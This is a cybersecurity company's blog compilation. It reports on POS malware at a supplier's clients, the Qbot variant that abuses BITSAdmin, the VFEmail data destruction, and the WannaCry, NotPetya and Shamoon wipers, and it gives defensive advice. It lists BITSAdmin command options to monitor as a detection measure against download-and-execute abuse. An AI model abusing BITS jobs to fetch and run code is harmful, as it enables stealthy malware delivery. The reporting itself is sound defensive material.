Supplier of point-of-sale products North Country Business Products revealed that POS systems of its nearly 140 business clients were infected with POS malware as cyber criminals compromised its IT system and later on planted POS malware on the network of some of its customers.
Lack of Trained Security Staff
Verizon’s 2018 Data Breach Investigations Report, meanwhile, said that businesses in the accommodation and food services industry rely almost exclusively on payment cards for their existence. Despite this reliance, this industry, in particular, restaurants are small organizations that typically don’t have trained security staff.
Good security controls and training will minimize the likelihood of a data breach for your business.
When you need help of experienced cybersecurity professionals, our team is a phone call away. Contact ustoday and protect your business.
Decade-Old Qbot Banking Malware Makes a Comeback
The decade-old Qbot banking malicious software (malware) has made a comeback, this time exploiting a tool that already exists on targeted computers: BITSAdmin.
Researchers at Varonisrevealed that thousands of computers around the globe have been compromised and under active control by a new variant of the Qbot malware, this time leveraging BITSAdmin, a common administration tool. The researchers said they found 2,726 unique victim IP addresses infected with this new variant of Qbot.
The researchers added that the number of victims is likely much larger as many organizations use port address translation that hides internal IP addresses. Majority of the Qbot malware victims, Varonis researchers said were located in the U.S., but victims were also found in Canada, the U.K., France, Brazil, Germany, South Africa, Russia, China and India.
What Is Qbot?
Qbot, also known as Qakbot or Pinkslipbot, is a malware that was first observed in the wild in 2007. Through the years, this malware has morphed into various versions due in part to the fact that the source code of this malware is publicly available. The various versions of Qbot retain the primary purpose of this malware, that is, to steal online banking account information from compromised computers.
According to Microsoft, over the years, cybercriminals behind Qbot have improved the Qbot code, enabling this malware to better “evade detection, stay under the radar longer, and increase the chances of spreading to other potential victims.”
Various versions of Qbot, including the latest version observed by Varonis, steal online banking account information from compromised computers through keylogging and hooking.
In keylogging, every keystroke that the victim enters is automatically captured and sent to the Qbot attackers. Hooking, also known as code hooking, modifies the behavior of a computer program. For instance, antivirus programs use hooking once it discovers the presence of a malware. On the flip side, cyberattackers use hooking as well, for instance, altering the behavior of a computer program or a browser, which can lead to exfiltration of passwords and cookies (referring to the text file that a web browser stores on a user's computer).
Another common feature of Qbot variants is the worm-like capability or the ability to spread across an organization’s network and infect other systems without user interaction. According to Microsoft, Qbot "can drop copies in other machines in the network using Server Message Block (SMB) and then use remote execution to activate.” SMB is a Microsoft Windows protocol for sharing files over a network.
Another common feature of Qbot variants is the initial infection process. Like many other cyberattacks, Qbot initially arrives on the victim's computer through malicious email campaigns, containing a malicious attachment and/or link.
What Is BITSAdmin?
BITS in the term “BITSAdmin” stands for Background Intelligent Transfer Service (BITS). BITS is a component of Microsoft Windows operating systems which facilitates updates and other applications to operate in the background without interrupting other networked applications.
Cybercriminals have learned to abuse BITS by using this legitimate administration tool for downloading, executing and even cleaning up after running malicious code. The interface to create and manage BITS jobs or tasks is accessible through PowerShell, a tool capable of executing code from memory and providing administrative access directly to a device's core, and BITSAdmin tool, a tool that can be used to create download or upload BITS jobs and monitor their progress.
In the past, cybercriminals behind Qbot have used PowerShell to download and run the Mimikatz, another malware that steals credentials, allowing attackers to move rapidly across a network once they have established an initial foothold.
Researchers at Varonis reported that the latest Qbot, uses BITSAdmin, another common administration tool in Windows operating systems, to download Qbot’s loader – a component that executes the core malware.
The abuse of legitimate administration tools such as PowerShell and the BITSAdmin are examples of “living off the land” cyberattack techniques that exploit tools that already exist on targeted computers. Exploiting these common administration tools makes detection difficult.
One probable explanation why the cyberattackers behind the latest variant of Qbot use the administration tool BITSAdmin, instead of PowerShell, is that PowerShell is now closely monitored on enterprise systems. A recent study conducted by IBMshowed that more than half or 57% of cyberattacks exploit tools that already exist on targeted computers. The IBM study highlighted that the administration tool that’s often exploited by cyberattackers is PowerShell.
Cyberattackers that abuse PowerShell and BITSAdmin have first to execute their malicious code on the targeted computer. The initial infection of PowerShell and BITSAdmin-based attacks is often phishing attacks, attacks that use malicious emails that contain malicious attachments and/or links.
In the case of the latest variant of Qbot, Varonis researchers said the first infection was likely carried out via a phishing email that tricked the victim into running a malicious file. Cybersecurity best practices for mitigating phishing attacks also apply for mitigating PowerShell and BITSAdmin-based attacks. These mitigating measures include deleting any suspicious emails, especially those containing suspicious links and/or attachments, and avoiding enabling macros in Microsoft Office.
Disabling all BITS functionality, meanwhile, as a preventive measure is a tricky business as this will likely have unintentional side effects, such as preventing legitimate software patching and updating. Some of the mitigating measures that are specific to BITSAdmin-based attacks include modifying host firewall rules and other network controls to only allow legitimate BITS traffic, and monitoring usage of the BITSAdmin tool, including the command options “Transfer”, “Create”, “AddFile”, “SetNotifyFlags”, “SetNotifyCmdLine”, “SetMinRetryDelay” and “Resume”.
Can Your Organization Survive a Cyberattack that Permanently Destroys Data?
Financial gain, either short-term or long-term, is often the motive of most cyber criminals. Some cyber criminals, however, aren’t after financial gain, but rather, they’re simply out to cause as much damage as possible.
The recent cyberattack at email service provider VFEmail shows an unconventional motive of simple destruction. Milwaukee-based VFEmail, founded in 2001, provides email service to businesses and individuals.
The first hints of the cyberattack on VFEmail came out last February 11, when the company’s Twitteraccount issued a series of tweets about the attack, starting with a tweet that said, “This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.”
By 5 PM on February 11, the company declared on its website, “We have suffered catastrophic destruction at the hands of a hacker.” The company added that the attacker destroyed nearly two decades' worth of emails of all data in the US, both primary and backup systems.
The company further said that the attacker hasn’t asked for ransom. “Just attack and destroy," the company said. When asked about the identity of the attacker, VFEmail owner Rick Romero tweetedit could be "someone who had data they didn't want found or I really pissed off."
This recent cyber incident isn’t the first time that cyber criminals have targeted VFEmail. In a blog postdated November 4, 2015, Romero shared that a group of hackers threatened to launch a distributed denial-of-service (DDoS) on his email service if he doesn’t pay 5 Bitcoins.
True enough, after refusing to pay the ransom, VFEmail’s email service was disrupted by a DDoS attack prompting Romero to expose the group's extortion campaign. In 2017, the company’s email service was once again disrupted by a series of DDoS attacks, prompting the company to change to a new hosting provider. In 2018, the company’s email service was once again disrupted by a DDoS attack.
It isn’t clear what actually caused the latest cyberattack on VFEmail. What’s clear though is that the company’s nearly two decades' worth of emails of all data in the US, both primary and backup systems, are lost forever.
Other Cases of Disruptive Cyberattacks
WannaCry and NotPetya
WannaCry and NotPetya are two examples of cyberattacks that were meant mainly to destroy. At the height of WannaCry attack on May 12, 2017, an estimated 300,000 computers in 150 countries were infected by WannaCry malicious software (malware). Six weeks after the WannaCry attack, NotPetya malware was launched although it didn’t have as much impact as WannaCry.
Both WannaCry and NotPetya exhibit the characteristics of a ransomware, a type of malware that’s designed to deny legitimate users access to computer files by encrypting these files. Similar to other ransomware, WannaCry and NotPetya attackers also demanded ransom from their victims, assuring them that once ransom is paid, the decryption key that would unlock the encrypted files would be given.
While exhibiting the characteristics of a ransomware, both WannaCry and NotPetya were later found to be wipers – malware whose sole purpose was to destroy. Both WannaCry and NotPetya are considered as wipers, not ransomware, as despite paying ransom to the attackers, the attackers wouldn’t be able to give the correct decryption key as they themselves have no way of determining who paid the ransom and who didn’t.
Shamoon is another malware whose main purpose is destruction. In December 2018, Italian oil services firm Saipemreported that its servers based in the Middle East, India, Aberdeen and, in a limited way, Italy were infected by a variant of Shamoon malware. As typical effects of the Shamoon malware, Saipem said in a statement, the infection resulted in the "cancellation of data and infrastructures." Days after the statement, the company’s head of digital and innovation, Mauro Piasere, told Reutersthat the attack crippled between 300 and 400 servers and up to 100 personal computers out of a total of about 4,000 Saipem machines.
According to Symantec, the latest version of Shamoon is far more destructive than the original Shamoon as the latest version has a new, second piece of wiping malware called “Trojan.Filerase,” a malware that deletes and overwrites files on the infected computer; while the original Shamoon malware itself erases the master boot record of the computer, rendering the computer unusable.
Because of the Filerase malware in the latest Shamoon version, Symantec said, recovery becomes impossible, compared to the older version of Shamoon in which the “files on the hard disk may be forensically recoverable.”
Here are some cybersecurity best practices in order to help prevent or minimize the effects of destructive cyberattacks – attacks that are meant to destroy:
Keep All Software Up-to-Date
Installing the latest patch or security update in a timely manner is one of the ways to keep destructive attacks at bay. Patches or security updates fix known security vulnerabilities that are likely to be exploited by cyber criminals.
Back-up Important Data
Similar to safeguarding your organization’s data from natural disasters, including fire and flood, having a back-up of important data will enable your organization to bounce back from a debilitating destructive cyberattack.
Practice Network Segmentation
It’s also important to practice network segmentation – the process of dividing your organization’s network into subnetworks. Network segmentation ensures that in case an attacker is able to infiltrate one of your organization’s network, the other networks won’t be affected.
Steve E. Driz, I.S.P., ITCP